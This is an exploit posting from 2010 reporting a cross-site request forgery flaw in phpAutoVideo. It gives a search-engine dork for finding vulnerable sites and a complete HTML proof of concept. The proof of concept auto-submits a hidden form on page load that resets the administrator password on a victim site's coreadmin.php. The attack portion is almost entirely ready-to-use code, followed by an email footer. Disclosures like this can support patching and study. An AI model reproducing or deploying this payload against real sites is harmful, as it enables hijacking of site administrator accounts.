phpAutoVideo suffers from a cross site request forgery vulnerability.
693d03421eb960be87cb1d96dfbc8fc57143ab006242ea13aa30a08cf3942aad
##################################################################
#Exploit Title: phpAutoVideo csrf #
#Date: 19/3/2010 #
#SoftWare:https://secure.agaresmedia.com/v6/products/phpautovideo#
#Dork: Copyright Agares Media phpautovideo #
#Author: GoLdeN-z3r0 #
##################################################################
(-----------------------------------------------------------------)
| PoC : |
(-----------------------------------------------------------------)
<html>
<body onload="document.registrationform.submit()">
<form action="http://[site]/admin/coreadmin.php" method="post" name="registrationform">
<input type="hidden" name="admintype" value="changepass">
<input type="hidden" name="passworda" value="z3r0">
<input type="hidden" name="passwordb" value="z3r0">
</form>
</body>
</html>
________________________________
Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>